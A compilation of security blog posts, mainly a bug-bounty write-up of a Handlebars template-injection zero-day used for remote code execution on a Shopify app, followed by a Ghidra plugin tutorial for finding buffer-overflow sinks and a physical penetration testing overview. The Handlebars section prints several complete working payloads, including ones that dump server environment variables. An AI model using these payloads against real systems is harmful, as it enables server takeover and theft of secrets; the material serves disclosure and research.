- Simple HTTP requests: https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#Simple_requests

Footnotes:
1. If, however, it is a hostname, the browser doesn't make sure it resolves to the same IP address during different requests; see the DNS Rebinding attack.
2. Even if fakebook.example prevents this using X-Frame-Options, the GET request is already sent.
3. iframe and object don't support CORS, so the browser should always refuse access, even if the server would allow a GET for this resource.

Written by Alex Nikolova (@AaylaSecura1138), Security Consultant at Aura Information Security.

Source: https://research.aurainfosec.io/same-origin-policy/
  8. Handlebars template injection and RCE in a Shopify app
     April 04, 2019

TL;DR

We found a zero-day in a JavaScript template library called Handlebars and used it to get Remote Code Execution in the Shopify Return Magic app.

The Story

In October 2018, Shopify organized the HackerOne event "H1-514", to which some specific researchers were invited, and I was one of them. Some of the Shopify apps that were in scope included an application called "Return Magic" that automates the whole return process when a customer wants to return a product they purchased through a Shopify store. Looking at the application, I found that it has a feature called Email WorkFlow where shop owners can customize the email message sent to users once they return a product. Users could use variables in their template, such as {{order.number}}, {{email}}, etc.

I decided to test this feature for Server Side Template Injection and entered {{this}} {{self}}, then sent a test email to myself, and the email had [object Object] in it, which immediately attracted my attention. I spent a lot of time trying to find out what the template engine was. I searched for popular NodeJS template engines and thought the engine was Mustache (wrong), and I kept looking for Mustache template injection online, but nothing came up, as Mustache is supposed to be a logicless template engine with no ability to call functions. That made no sense, since I was able to access some object attributes, such as {{this.__proto__}}, and even reach functions such as {{this.constructor.constructor}}, which is the Function constructor. I kept trying to send parameters to this.constructor.constructor() but failed. I decided that this was not vulnerable and moved on to look for more bugs.

Then fate decided that this bug needed to be found, and I saw a message from Shopify on the event Slack channel asking researchers to submit their "almost bugs": if someone found something and feels it's exploitable, they could send the bug to the Shopify security team, and if the team manages to exploit it, the reporter gets paid as if they had found it. Immediately I sent my submission explaining what I had found, and in the impact section I wrote "Could be a Server Side template injection that can be used to take over the server ¯\_(ツ)_/¯".

Two months passed and I got no response from Shopify regarding my "almost bug" submission. Then I was invited to another hacking event in Bali, hosted by Synack. There I met the Synack Red Team, and after the Synack event had ended, I was supposed to travel back to Egypt, but only 3 hours before the flight I decided to extend my stay for three more days and then fly from Bali to Japan, where I was supposed to participate in the TrendMicro CTF competition with my CTF team. Some of the SRT also decided to extend their stay in Bali. One of them was Matias, so I contacted him to hang out together. After swimming in the ocean and enjoying the beautiful nature of Bali, we went to a restaurant for dinner, where Matias told me about a bug he had found in a bug bounty program that had something to do with JavaScript sandbox escapes, so we spent all night messing with objects and constructors, but unfortunately we couldn't escape the sandbox. I couldn't get constructors out of my head, and I remembered the template injection bug I had found in Shopify.
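(As a quick aside on the primitive being probed here: on any JavaScript object, constructor.constructor is the Function constructor, which compiles a function from a source string. A one-liner in plain Node, outside any template engine, shows why reaching it matters:)

$ node -e "console.log(({}).constructor.constructor('return process.pid')())"

This prints the Node process's PID; being able to hand the Function constructor an arbitrary string is code execution, and the rest of the write-up is about smuggling that string past Handlebars.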
I looked at the HackerOne report and thought that the template engine couldn't be Mustache, so I installed Mustache locally, and when I parsed {{this}} with Mustache it actually returned nothing, which is not the case with the Shopify application. I searched again for popular NodeJS template engines and found a bunch of them. I looked for those that used curly brackets {{ }} for template expressions and downloaded them locally. One of the libraries was Handlebars, and when I parsed {{this}} it returned [object Object], which is the same as the Shopify app. I looked at the Handlebars documentation and found that it, too, is supposed to not have much logic, to prevent template injection attacks. But knowing that I could access the Function constructor, I decided to give it a try and see how I could pass parameters to functions.

After reading the documentation, I found out that in Handlebars developers can register functions as helpers in the template scope. We can pass parameters to helpers like this: {{helper "param1" "param2" ...params}}. So the first thing I tried was {{this.constructor.constructor "console.log(process.pid)"}}, but it just returned console.log(process.pid) as a string. I went to the source code to find out what was happening. In the runtime.js file, there was the following function:

lambda: function(current, context) {
  return typeof current === 'function' ? current.call(context) : current;
}

What this function does is check whether the current object is of type 'function'; if so, it calls it using current.call(context), where context is the template scope; otherwise, it just returns the object itself. I looked further in the documentation of Handlebars and found that it has built-in helpers such as "with", "blockHelperMissing", "forEach", etc. After reading the source code for each helper, I had an exploit in mind using the "with" helper, as it is used to shift the context for a section of a template. Using the built-in with block helper, I would be able to perform current.call(context) on my own context. So I tried the following:

{{#with "console.log(process.pid)"}}
  {{#this.constructor.constructor}}
    {{#this}}
    {{/this}}
  {{/this.constructor.constructor}}
{{/with}}

Basically, that should pass console.log(process.pid) as the current context; then, when the Handlebars compiler reaches this.constructor.constructor and finds that it's a function, it should call it with the current context as the function argument. Then, using {{#with this}}, we call the function returned from the Function constructor, and console.log(process.pid) gets executed. However, this did not work, because function.call() is used to invoke a method with an owner object as an argument: the first argument is the owner object, and the other arguments are the parameters sent to the function being called. So if the function had been called like current.call(this, context), the previous payload would have worked.

I spent two more nights in Ubud, then flew to Tokyo for the TrendMicro CTF. Again, in Tokyo, I couldn't get objects and constructors out of my mind and kept trying to find a way to escape the sandbox. I had another idea of using Array.map() to call the Function constructor on my context, but it didn't work, because the compiler always passes an extra argument to any function I call, an object containing the template scope, which causes an error, as my payload is considered a function argument, not the function body.
{{#with 1 as |int|}}
  {{#blockHelperMissing int as |array|}} // This line will create an array, and then we can access its constructor
    {{#with (array.constructor "console.log(process.pid)")}}
      {{this.pop}} // pop the unnecessary parameter pushed by the compiler
      {{array.map this.constructor.constructor array}}
    {{/with}}
  {{/blockHelperMissing}}
{{/with}}

There seemed to be many possible ways to escape the sandbox, but I had one big problem facing me: whenever a function is called within the template, the template compiler sends the template scope object as the last parameter. For example, if I try to call something like constructor.constructor("test","test"), the compiler will call it like constructor.constructor("test", "test", this), and since this will be converted to a string by calling Object.toString(), the anonymous function created will be:

function anonymous(test,test){
  [object Object]
}

which will cause an error. I tried many other things but still had no luck. Then I decided to open the JavaScript documentation for the Object prototype and look for something that could help escape the sandbox. I found out that I could overwrite the Object.prototype.toString() function using Object.defineProperty(), so that it calls a function that returns a user-controlled string (my payload). Since I can't define functions using the template, all I have to do is find a function that is already defined within the template scope and returns user-controlled input. For example, the following NodeJS application should be vulnerable:

test.js:

var handlebars = require('handlebars'),
    fs = require('fs');

var storeName = "console.log(process.pid)" // this should be a user-controlled string

function getStoreName(){
    return storeName;
}

var scope = {
    getStoreName: getStoreName
}

fs.readFile('example.html', 'utf-8', function(error, source){
    var template = handlebars.compile(source);
    var html = template(scope);
    console.log(html)
});

example.html:

{{#with this as |test|}} // with is a helper that sets whatever is assigned to it as the context; we name our context test
  {{#with (test.constructor.getOwnPropertyDescriptor this "getStoreName")}} // get the descriptor of this.getStoreName, where this is the template scope defined in test.js
    {{#with (test.constructor.defineProperty test.constructor.prototype "toString" this)}} // overwrite Object.prototype.toString with getStoreName, defined in test.js
      {{#with (test.constructor.constructor "test")}} {{/with}} // call the Function constructor
    {{/with}}
  {{/with}}
{{/with}}

Now, if you run this template, console.log(process.pid) gets executed:

$ node test.js
1337

I reported that to Shopify and mentioned that if there were a function within the scope that returned a user-controlled string, it would have been possible to get RCE. Later, when I met Ibrahim (@the_st0rm), I told him about my idea, and he told me that I could use bind() to create a new function that, when called, returns my RCE payload. From the JavaScript documentation:

The bind() method creates a new function that, when called, has its this keyword set to the provided value, with a given sequence of arguments preceding any provided when the new function is called.

So now the idea is to create a string with whichever code I want to execute, then bind its toString() to a function using bind(), and after that overwrite the Object.prototype.toString() function with that function.
I spent a lot of time trying to apply this using Handlebars templates, and eventually, during my flight back to Egypt, I was able to get a fully working PoC with no need for functions defined in the template scope:

{{#with this as |obj|}}
  {{#with (obj.constructor.keys "1") as |arr|}}
    {{arr.pop}}
    {{arr.push obj.constructor.name.constructor.bind}}
    {{arr.pop}}
    {{arr.push "console.log(process.env)"}}
    {{arr.pop}}
    {{#blockHelperMissing obj.constructor.name.constructor.bind}}
      {{#with (arr.constructor (obj.constructor.name.constructor.bind.apply obj.constructor.name.constructor arr))}}
        {{#with (obj.constructor.getOwnPropertyDescriptor this 0)}}
          {{#with (obj.constructor.defineProperty obj.constructor.prototype "toString" this)}}
            {{#with (obj.constructor.constructor "test")}}
            {{/with}}
          {{/with}}
        {{/with}}
      {{/with}}
    {{/blockHelperMissing}}
  {{/with}}
{{/with}}

Basically, what the template above does is:

x = ''
myToString = x.constructor.bind.apply(x.constructor, [x.constructor.bind, "console.log(process.pid)"])
myToStringArr = Array(myToString)
myToStringDescriptor = Object.getOwnPropertyDescriptor(myToStringArr, 0)
Object.defineProperty(Object.prototype, "toString", myToStringDescriptor)
Object.constructor("test", this)()

And when I tried it with Shopify, it worked.

Matias also texted me with an exploit he had gotten working, which is much simpler than the one I used:

{{#with "s" as |string|}}
  {{#with "e"}}
    {{#with split as |conslist|}}
      {{this.pop}}
      {{this.push (lookup string.sub "constructor")}}
      {{this.pop}}
      {{#with string.split as |codelist|}}
        {{this.pop}}
        {{this.push "return JSON.stringify(process.env);"}}
        {{this.pop}}
        {{#each conslist}}
          {{#with (string.sub.apply 0 codelist)}}
            {{this}}
          {{/with}}
        {{/each}}
      {{/with}}
    {{/with}}
  {{/with}}
{{/with}}

With that said, I was able to get RCE on Shopify's Return Magic application, as well as on some other websites that used Handlebars as a template engine. The vulnerability was also submitted to npm security, and Handlebars pushed a fix that disables access to constructors. The advisory can be found here: https://www.npmjs.com/advisories/755

In a nutshell

You can use the following to inject Handlebars templates:

{{#with this as |obj|}}
  {{#with (obj.constructor.keys "1") as |arr|}}
    {{arr.pop}}
    {{arr.push obj.constructor.name.constructor.bind}}
    {{arr.pop}}
    {{arr.push "return JSON.stringify(process.env);"}}
    {{arr.pop}}
    {{#blockHelperMissing obj.constructor.name.constructor.bind}}
      {{#with (arr.constructor (obj.constructor.name.constructor.bind.apply obj.constructor.name.constructor arr))}}
        {{#with (obj.constructor.getOwnPropertyDescriptor this 0)}}
          {{#with (obj.constructor.defineProperty obj.constructor.prototype "toString" this)}}
            {{#with (obj.constructor.constructor "test")}}
              {{this}}
            {{/with}}
          {{/with}}
        {{/with}}
      {{/with}}
    {{/blockHelperMissing}}
  {{/with}}
{{/with}}

Matias also had his own exploit, which is much simpler:

{{#with "s" as |string|}}
  {{#with "e"}}
    {{#with split as |conslist|}}
      {{this.pop}}
      {{this.push (lookup string.sub "constructor")}}
      {{this.pop}}
      {{#with string.split as |codelist|}}
        {{this.pop}}
        {{this.push "return JSON.stringify(process.env);"}}
        {{this.pop}}
        {{#each conslist}}
          {{#with (string.sub.apply 0 codelist)}}
            {{this}}
          {{/with}}
        {{/each}}
      {{/with}}
    {{/with}}
  {{/with}}
{{/with}}

Sorry for the long post; if you have any questions, please drop me a tweet @Zombiehelp54.

Source: https://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html
  9. Ghidra Plugin Development for Vulnerability Research - Part 1

Overview

On March 5th, at the RSA security conference, the National Security Agency (NSA) released a reverse engineering tool called Ghidra. Similar to IDA Pro, Ghidra is a disassembler and decompiler with many powerful features (e.g., plugin support, graph views, cross-references, syntax highlighting, etc.). Although Ghidra's plugin capabilities are powerful, there is little information published on its full capabilities. This blog post series will focus on Ghidra's plugin development and how it can be used to help identify software vulnerabilities.

In our previous post, we leveraged IDA Pro's plugin functionality to identify sinks (potentially vulnerable functions or programming syntax). We then improved upon this technique in our follow-up blog post to identify inline strcpy calls, and identified a buffer overflow in Microsoft Office. In this post, we will use similar techniques with Ghidra's plugin feature to identify sinks in CoreFTPServer v1.2 build 505.

Ghidra Plugin Fundamentals

Before we begin, we recommend going through the example Ghidra plugin scripts and the front page of the API documentation to understand the basics of writing a plugin (Help -> Ghidra API Help). When a Ghidra plugin script runs, the current state of the program is handled by the following five objects:

- currentProgram: the active program
- currentAddress: the address of the current cursor location in the tool
- currentLocation: the program location of the current cursor location in the tool, or null if no program location exists
- currentSelection: the current selection in the tool, or null if no selection exists
- currentHighlight: the current highlight in the tool, or null if no highlight exists

It is important to note that Ghidra is written in Java, and its plugins can be written in Java or Jython. For the purposes of this post, we will be writing a plugin in Jython. There are three ways to use Ghidra's Jython API:

- Using the Python IDE (similar to the IDA Python console)
- Loading a script from the script manager
- Headless: using Ghidra without a GUI

With an understanding of Ghidra plugin basics, we can now dive deeper into the source code by utilizing the script manager (Right Click on the script -> Edit with Basic Editor). The example plugin scripts are located under /path_to_ghidra/Ghidra/Features/Python/ghidra_scripts. (In the script manager, these are located under Examples/Python/.)

Ghidra Plugin Sink Detection

In order to detect sinks, we first have to create a list of sinks that can be utilized by our plugin. For the purposes of this post, we will target the sinks that are known to produce buffer overflow vulnerabilities. These sinks can be found in various write-ups, books, and publications. Our plugin will first identify all function calls in a program and check them against our list of sinks to filter out the targets. For each sink, we will identify all of their parent functions and called addresses. By the end of this process, we will have a plugin that can map the calling functions to sinks, and therefore identify sinks that could result in a buffer overflow.

Locating Function Calls

There are various methods to determine whether a program contains sinks. We will be focusing on the below methods, and will discuss each in detail in the following sections:

1. Linear Search: iterate over the text section (executable section) of the binary and check the instruction operand against our predefined list of sinks.
Cross References (Xrefs) - Utilize Ghidra's built-in identification of cross references and query the cross references to sinks.

Linear Search
The first method of locating all function calls in a program is to do a sequential search. While this method may not be the ideal search technique, it is a great way of demonstrating some of the features of Ghidra's API. Using the code below, we can print out all instructions in our program:

listing = currentProgram.getListing() #get a Listing interface
ins_list = listing.getInstructions(1) #get an Instruction iterator

while ins_list.hasNext(): #go through each instruction and print it out to the console
    ins = ins_list.next()
    print (ins)

Running the above script on CoreFTPServer gives us the following output: we can see that all of the x86 instructions in the program were printed out to the console.
Next, we filter for sinks that are utilized in the program. It is important to check for duplicates, as there could be multiple references to the identified sinks. Building upon the previous code, we now have the following:

sinks = [
    "strcpy", "memcpy", "gets", "memmove", "scanf", "lstrcpy", "strcpyW",
    #...
]

duplicate = []
listing = currentProgram.getListing()
ins_list = listing.getInstructions(1)

while ins_list.hasNext():
    ins = ins_list.next()
    ops = ins.getOpObjects(0)
    try:
        target_addr = ops[0]
        sink_func = listing.getFunctionAt(target_addr)
        sink_func_name = sink_func.getName()
        if sink_func_name in sinks and sink_func_name not in duplicate:
            duplicate.append(sink_func_name)
            print (sink_func_name, target_addr)
    except:
        pass

Now that we have identified a list of sinks in our target binary, we have to locate where these functions are getting called. Since we are iterating through the executable section of the binary and checking every operand against the list of sinks, all we have to do is add a filter for the call instruction. Adding this check to the previous code gives us the following:

sinks = [
    "strcpy", "memcpy", "gets", "memmove", "scanf", "strcpyA", "strcpyW",
    "wcscpy", "_tcscpy", "_mbscpy", "StrCpy", "StrCpyA", "lstrcpyA", "lstrcpy",
    #...
]

duplicate = []
listing = currentProgram.getListing()
ins_list = listing.getInstructions(1)

#iterate through each instruction
while ins_list.hasNext():
    ins = ins_list.next()
    ops = ins.getOpObjects(0)
    mnemonic = ins.getMnemonicString()
    #check to see if the instruction is a call instruction
    if mnemonic == "CALL":
        try:
            target_addr = ops[0]
            sink_func = listing.getFunctionAt(target_addr)
            sink_func_name = sink_func.getName()
            #check to see if function being called is in the sinks list
            if sink_func_name in sinks and sink_func_name not in duplicate:
                duplicate.append(sink_func_name)
                print (sink_func_name, target_addr)
        except:
            pass

Running the above script against CoreFTPServer v1.2 build 505 shows the results for all detected sinks. Unfortunately, the above code does not detect any sinks in the CoreFTPServer binary. However, we know that this particular version of CoreFTPServer is vulnerable to a buffer overflow and contains the lstrcpyA sink. So, why did our plugin fail to detect any sinks?
After researching this question, we discovered that in order to identify the functions that are calling out to an external DLL, we need to use the function manager that specifically handles the external functions. To do this, we modified our code so that every time we see a call instruction, we go through all external functions in our program and check them against the list of sinks.
Then, if they are found in the list, we verify that the operand matches the address of the sink. The following is the modified section of the script:

sinks = [
    "strcpy", "memcpy", "gets", "memmove", "scanf", "strcpyA", "strcpyW",
    "wcscpy", "_tcscpy", "_mbscpy", "StrCpy", "StrCpyA", "lstrcpyA", "lstrcpy",
    #...
]

program_sinks = {}
listing = currentProgram.getListing()
ins_list = listing.getInstructions(1)
fm = currentProgram.getFunctionManager()
ext_fm = fm.getExternalFunctions()

#iterate through each of the external functions to build a dictionary
#of external functions and their addresses
while ext_fm.hasNext():
    ext_func = ext_fm.next()
    target_func = ext_func.getName()
    #if the function is a sink then add its address to a dictionary
    if target_func in sinks:
        loc = ext_func.getExternalLocation()
        sink_addr = loc.getAddress()
        sink_func_name = loc.getLabel()
        program_sinks[sink_addr] = sink_func_name

#iterate through each instruction
while ins_list.hasNext():
    ins = ins_list.next()
    ops = ins.getOpObjects(0)
    mnemonic = ins.getMnemonicString()
    #check to see if the instruction is a call instruction
    if mnemonic == "CALL":
        try:
            #get address of operand
            target_addr = ops[0]
            #check to see if address exists in generated sink dictionary
            if program_sinks.get(target_addr):
                print (program_sinks[target_addr], target_addr, ins.getAddress())
        except:
            pass

Running the modified script against our program shows that we identified multiple sinks that could result in a buffer overflow.

Xrefs
The second and more efficient approach is to identify cross references to each sink and check which cross references are calling the sinks in our list. Because this approach does not search through the entire text section, it is more efficient. Using the code below, we can identify cross references to each sink:

sinks = [
    "strcpy", "memcpy", "gets", "memmove", "scanf", "strcpyA", "strcpyW",
    "wcscpy", "_tcscpy", "_mbscpy", "StrCpy", "StrCpyA", "lstrcpyA", "lstrcpy",
    #...
]

duplicate = []
func = getFirstFunction()

while func is not None:
    func_name = func.getName()
    #check if function name is in sinks list
    if func_name in sinks and func_name not in duplicate:
        duplicate.append(func_name)
        entry_point = func.getEntryPoint()
        references = getReferencesTo(entry_point)
        #print cross-references
        print(references)
    #set the function to the next function
    func = getFunctionAfter(func)

Now that we have identified the cross references, we can get an instruction for each reference and add a filter for the call instruction. A final modification is added to include the use of the external function manager:

sinks = [
    "strcpy", "memcpy", "gets", "memmove", "scanf", "strcpyA", "strcpyW",
    "wcscpy", "_tcscpy", "_mbscpy", "StrCpy", "StrCpyA", "lstrcpyA", "lstrcpy",
    #...
]

duplicate = []
fm = currentProgram.getFunctionManager()
listing = currentProgram.getListing()
ext_fm = fm.getExternalFunctions()

#iterate through each external function
while ext_fm.hasNext():
    ext_func = ext_fm.next()
    target_func = ext_func.getName()
    #check if the function is in our sinks list
    if target_func in sinks and target_func not in duplicate:
        duplicate.append(target_func)
        loc = ext_func.getExternalLocation()
        sink_func_addr = loc.getAddress()
        if sink_func_addr is None:
            sink_func_addr = ext_func.getEntryPoint()
        if sink_func_addr is not None:
            references = getReferencesTo(sink_func_addr)
            #iterate through all cross references to potential sink
            for ref in references:
                call_addr = ref.getFromAddress()
                ins = listing.getInstructionAt(call_addr)
                mnemonic = ins.getMnemonicString()
                #print the sink and address of the sink if
                #the instruction is a call instruction
                if mnemonic == "CALL":
                    print (target_func, sink_func_addr, call_addr)

Running the modified script against CoreFTPServer gives us a list of sinks that could result in a buffer overflow.

Mapping Calling Functions to Sinks
So far, our Ghidra plugin can identify sinks. With this information, we can take it a step further by mapping the calling functions to the sinks. This allows security researchers to visualize the relationship between a sink and its incoming data. For the purpose of this post, we will use the graphviz module to draw the graph. Putting it all together gives us the following code:

from ghidra.program.model.address import Address
from ghidra.program.model.listing.CodeUnit import *
from ghidra.program.model.listing.Listing import *
import sys
import os

#get ghidra root directory
ghidra_default_dir = os.getcwd()

#get ghidra jython directory
jython_dir = os.path.join(ghidra_default_dir, "Ghidra", "Features", "Python", "lib", "Lib", "site-packages")

#insert jython directory into system path
sys.path.insert(0, jython_dir)

from beautifultable import BeautifulTable
from graphviz import Digraph

sinks = [
    "strcpy", "memcpy", "gets", "memmove", "scanf", "strcpyA", "strcpyW",
    "wcscpy", "_tcscpy", "_mbscpy", "StrCpy", "StrCpyA", "StrCpyW", "lstrcpy",
    "lstrcpyA", "lstrcpyW",
    #...
]

sink_dic = {}
duplicate = []
listing = currentProgram.getListing()
ins_list = listing.getInstructions(1)

#iterate over each instruction
while ins_list.hasNext():
    ins = ins_list.next()
    mnemonic = ins.getMnemonicString()
    ops = ins.getOpObjects(0)
    if mnemonic == "CALL":
        try:
            target_addr = ops[0]
            func_name = None
            if isinstance(target_addr, Address):
                code_unit = listing.getCodeUnitAt(target_addr)
                if code_unit is not None:
                    ref = code_unit.getExternalReference(0)
                    if ref is not None:
                        func_name = ref.getLabel()
                    else:
                        func = listing.getFunctionAt(target_addr)
                        func_name = func.getName()
            #check if function name is in our sinks list
            if func_name in sinks and func_name not in duplicate:
                duplicate.append(func_name)
                references = getReferencesTo(target_addr)
                for ref in references:
                    call_addr = ref.getFromAddress()
                    sink_addr = ops[0]
                    parent_func_name = getFunctionBefore(call_addr).getName()
                    #check sink dictionary for parent function name
                    if sink_dic.get(parent_func_name):
                        if sink_dic[parent_func_name].get(func_name):
                            if call_addr not in sink_dic[parent_func_name][func_name]['call_address']:
                                sink_dic[parent_func_name][func_name]['call_address'].append(call_addr)
                        else:
                            sink_dic[parent_func_name] = {func_name: {"address": sink_addr, "call_address": [call_addr]}}
                    else:
                        sink_dic[parent_func_name] = {func_name: {"address": sink_addr, "call_address": [call_addr]}}
        except:
            pass

#instantiate graphviz
graph = Digraph("ReferenceTree")
graph.graph_attr['rankdir'] = 'LR'
duplicate = 0

#add sinks and parent functions to a graph
for parent_func_name, sink_func_list in sink_dic.items():
    #parent functions will be blue
    graph.node(parent_func_name, parent_func_name, style="filled", color="blue", fontcolor="white")
    for sink_name, sink_list in sink_func_list.items():
        #sinks will be colored red
        graph.node(sink_name, sink_name, style="filled", color="red", fontcolor="white")
        for call_addr in sink_list['call_address']:
            if duplicate != call_addr:
                graph.edge(parent_func_name, sink_name, label=call_addr.toString())
                duplicate = call_addr

ghidra_default_path = os.getcwd()
graph_output_file = os.path.join(ghidra_default_path, "sink_and_caller.gv")

#create the graph and view it using graphviz
graph.render(graph_output_file, view=True)

Running the script against our program shows the resulting graph: the calling functions are highlighted in blue and the sink is highlighted in red. The addresses of the calling functions are displayed on the lines pointing to the sink. After conducting some manual analysis, we were able to verify that several of the sinks identified by our Ghidra plugin produced a buffer overflow. The following screenshot of WinDBG shows that EIP is overwritten by 0x42424242 as a result of an lstrcpyA function call.

Additional Features
Although visualizing the result in a graph format is helpful for vulnerability analysis, it would also be useful if the user could choose different output formats. The Ghidra API provides several methods for interacting with a user and several ways of outputting data. We can leverage the Ghidra API to allow a user to choose an output format (e.g. text, JSON, graph) and display the result in the chosen format. The example below shows the dropdown menu with three different display formats. The full script is available on our github.

Limitations
There are multiple known issues with Ghidra, and one of the biggest issues for writing an analysis plugin like ours is that the Ghidra API does not always return the correct address of an identified standard function.
Unlike IDA Pro, which has a database of function signatures (FLIRT signatures) from multiple libraries that can be used to detect standard function calls, Ghidra only comes with a few export files (similar to signature files) for DLLs. Occasionally, the standard library detection will fail. By comparing IDA Pro's and Ghidra's disassembly output of CoreFTPServer, we can see that IDA Pro's analysis successfully identified and mapped the function lstrcpyA using a FLIRT signature, whereas Ghidra shows a call to the memory address of the function lstrcpyA. Although the public release of Ghidra has limitations, we expect to see improvements that will enhance the standard library analysis and aid in automated vulnerability research.

Conclusion
Ghidra is a powerful reverse engineering tool that can be leveraged to identify potential vulnerabilities. Using Ghidra's API, we were able to develop a plugin that identifies sinks and their parent functions and displays the results in various formats. In our next blog post, we will conduct additional automated analysis using Ghidra and enhance the plugin's vulnerability detection capabilities.

Posted on April 5, 2019 by Somerset Recon and tagged Ghidra Reverse Engineering Plugin Vulnerability Analysis.

Sursa: https://www.somersetrecon.com/blog/2019/ghidra-plugin-development-for-vulnerability-research-part-1
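As a side note on the headless mode the post mentions only in passing: a sink-detection script like the ones above can also be run without the GUI via Ghidra's analyzeHeadless launcher. A minimal sketch follows; the project directory, project name, sample path, and script file name are placeholders, not taken from the original post.

# run a sink-detection script without the GUI; paths and names are hypothetical
./support/analyzeHeadless ~/ghidra_projects CoreFTP \
    -import ~/samples/coreftpserver.exe \
    -scriptPath ~/ghidra_scripts \
    -postScript detect_sinks.py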
  10. How to Perform Physical Penetration Testing
Guest Contributor: Chiheb Chebbi

Abstract
No one can deny that physical security plays a huge role in, and is a necessary aspect of, "Information Security" in general. This article will guide us through many important terminologies in physical security and show us how to perform physical penetration testing. In this article we are going to discover:
Information security and physical security: the link
Physical security overview
Physical penetration testing
Crime prevention through environmental design (CPTED)
After reading this article you can use this document, which contains many useful resources to help you learn more about physical security and physical penetration testing: Physical Security

Information security and Physical security: The Link
Before diving deep into physical security, a few points need to be discussed to avoid any confusion. Many newcomers to information security assume that the main role of information security professionals is securing computers, servers, and devices in general, but they neglect the fact that the role of an information security professional is to secure "information", and information can be stored using different means, including paper, paper mail, bills, notebooks and so on. Also, many don't know that the most valuable asset in an organization is not a technical device, and not even a multi-million-dollar datacenter, but "the human". Yes! In risk management, risks against humans should be mitigated first, urgently. Thus, securing the physical environment is included in the tasks of risk managers and CISOs (if I am mistaken, please correct me). For more information, I highly recommend you check this great paper from the SANS Institute: Physical Security and Why It Is Important – SANS Institute

Physical Security Overview
By definition, "Physical security is the protection of personnel, hardware, software, networks and data from physical actions and events that could cause serious loss or damage to an enterprise, agency or institution. This includes protection from fire, flood, natural disasters, burglary, theft, vandalism, and terrorism." [https://searchsecurity.techtarget.com]
Physical security has three important components:
Access control
Surveillance
Testing
As you can see from the definition, your job is also to secure the enterprise against natural disasters and physical accidents.

Physical Threats
The International Information System Security Certification Consortium, or (ISC)², describes the role of information security professionals in the CISSP Study Guide (by Eric Conrad, Seth Misenar and Joshua Feldman) as follows: "Our job as information security professionals is to evaluate risks against our critical assets and deploy safeguards to mitigate those risks. We work in various roles: firewall engineers, penetration testers, auditors, management, etc. The common thread is risk: it is part of our job description."
Risks can be presented in a mathematical way using the following formula:
Risk = Threat x Vulnerability
(Sometimes we add another parameter called "Impact", but for now let's just focus on threats and vulnerabilities. A toy numeric sketch of this formula appears at the end of this article.)
In your day-to-day job you will face many threats.
(To avoid confusion between the three terms Threat, Vulnerability, and Risk, check the first section of this article: How to build a Threat Hunting platform using ELK Stack.)
Some physical threats are the following:
Natural environmental threats: disasters, floods, earthquakes, volcanoes, tsunamis, avalanches
Politically motivated threats
Supply and transportation threats

Security Defenses
To defend against physical threats, you need to implement and deploy the right safeguards. For example, you can use a defense-in-depth approach. The major physical safeguards are the following:
Video surveillance
Fences
Security guards
Locks and smart locks
Biometric access controls
Different and well-chosen windows
Mitigating power loss and excess
Guard dogs
Lights
Signs
Man-traps
Different fire suppression and protection systems (soda acid, water, gas, halon). Fire extinguishers should be chosen based on the class of fire:
Class A – fires involving solid materials such as wood, paper or textiles.
Class B – fires involving flammable liquids such as petrol, diesel or oils.
Class C – fires involving gases.
Class D – fires involving metals.
Class E – fires involving live electrical apparatus. (Technically 'Class E' doesn't exist; however, it is used here for convenience.)
Class F – fires involving cooking oils such as in deep-fat fryers.
You can check the different fire extinguishers using this useful link: https://www.marsden-fire-safety.co.uk/resources/fire-extinguishers

Access Control
Access control is vital when it comes to physical security, so I want to take this opportunity to talk a little bit about it. As you may have noticed, many information security aspects are taken from, or inspired by, the military (team names: Red Team, Blue Team and so on). Access control, too, is inspired by the military. To represent security policies in a logical way, we use what we call security models. These models are inspired by the Trusted Computing Base (TCB), which is described in the US Department of Defense Standard 5200.28. This standard is also known as the Orange Book. These are the most well-known security models:
Bell-LaPadula Model
Biba Model
Clark-Wilson Model
To learn more about security models, read this document: https://media.techtarget.com/searchSecurity/downloads/29667C05.pdf
Access controls are a form of technical security control (a control, as a noun, means an entity that checks based on a standard). We have three access control categories:
Mandatory Access Control (MAC): The system checks the identity of a subject and its permissions against the object's permissions. Usually, both subjects and objects have labels using a ranking system (top secret, confidential, and so on).
Discretionary Access Control (DAC): The object owner is allowed to set permissions for users. Passwords are a form of DAC.
Role-Based Access Control (RBAC): As its name indicates, access is based on assigned roles.

Physical Penetration Testing
By now we have acquired a fair understanding of many important aspects of physical security. Let's move on to another point, which is how to perform physical penetration testing. By definition: "A penetration test, or pen-test, is an attempt to evaluate the security of an IT infrastructure by safely trying to exploit vulnerabilities.
These vulnerabilities may exist in operating systems, services and application flaws, improper configurations or risky end-user behavior." [www.coresecurity.com]
When it comes to penetration testing, we have three types:
White-box pentesting: the pentester knows everything about the target, including physical environment information, employees, IP addresses, host and server information and so on (within the agreed scope, of course)
Black-box pentesting: in this case, the pentester doesn't know anything about the target
Gray-box pentesting: a mix between the two types
Usually, penetration testers follow a pentesting standard when performing a penetration testing mission. Standards are a low-level description of how the organization will enforce the policy; in other words, they are used to maintain a minimum level of effective cybersecurity. To learn the difference between standard, policy, procedure and guideline, check this useful link: https://frsecure.com/blog/differentiating-between-policies-standards-procedures-and-guidelines/
As a penetration tester you can choose from a great number of pentesting standards, such as:
The Open Source Security Testing Methodology Manual (OSSTMM)
The Information Systems Security Assessment Framework (ISSAF)
The Penetration Testing Execution Standard (PTES)
The Payment Card Industry Data Security Standard (PCI DSS)
If you selected the Penetration Testing Execution Standard (PTES), for example (https://media.readthedocs.org/pdf/pentest-standard/latest/pentest-standard.pdf), you need to follow these steps and phases:
Pre-engagement Interactions
Intelligence Gathering
Threat Modeling
Vulnerability Analysis
Exploitation
Post Exploitation
Reporting
(Just click on any step to learn more about it.)

The Team
You can't perform a successful physical penetration testing mission without a great team. Wil Allsopp, in his great book "Unauthorised Access: Physical Penetration Testing For IT Security Teams", gives a great operations team suggestion. He believes that every good physical penetration testing team should contain:
Operator
Team Leader
Coordinator or Planner
Social Engineer
Computer Intrusion Specialist
Physical Security Specialist
Surveillance Specialist
He also gives a great workflow you can use in your mission.
Peerlyst is also loaded with great physical security articles. The following are some of them:
Most Locks are stupid easy to pick
How to become a Hardware Security Specialist
Hardware/Software vendor playbook: Handling vulnerabilities found in your products after launch
The hardware security and firmware security wiki
Becoming a Penetration Tester – Hardware Hacking Part 1
Best practices for securing hardware devices against physical intrusion
[TOOL] Umbrella App: Digital and Physical Security Lessons and Advice in Your Pocket!
Physical Security Blog. Part 1: Why the Physical Security Industry is Dysfunctional
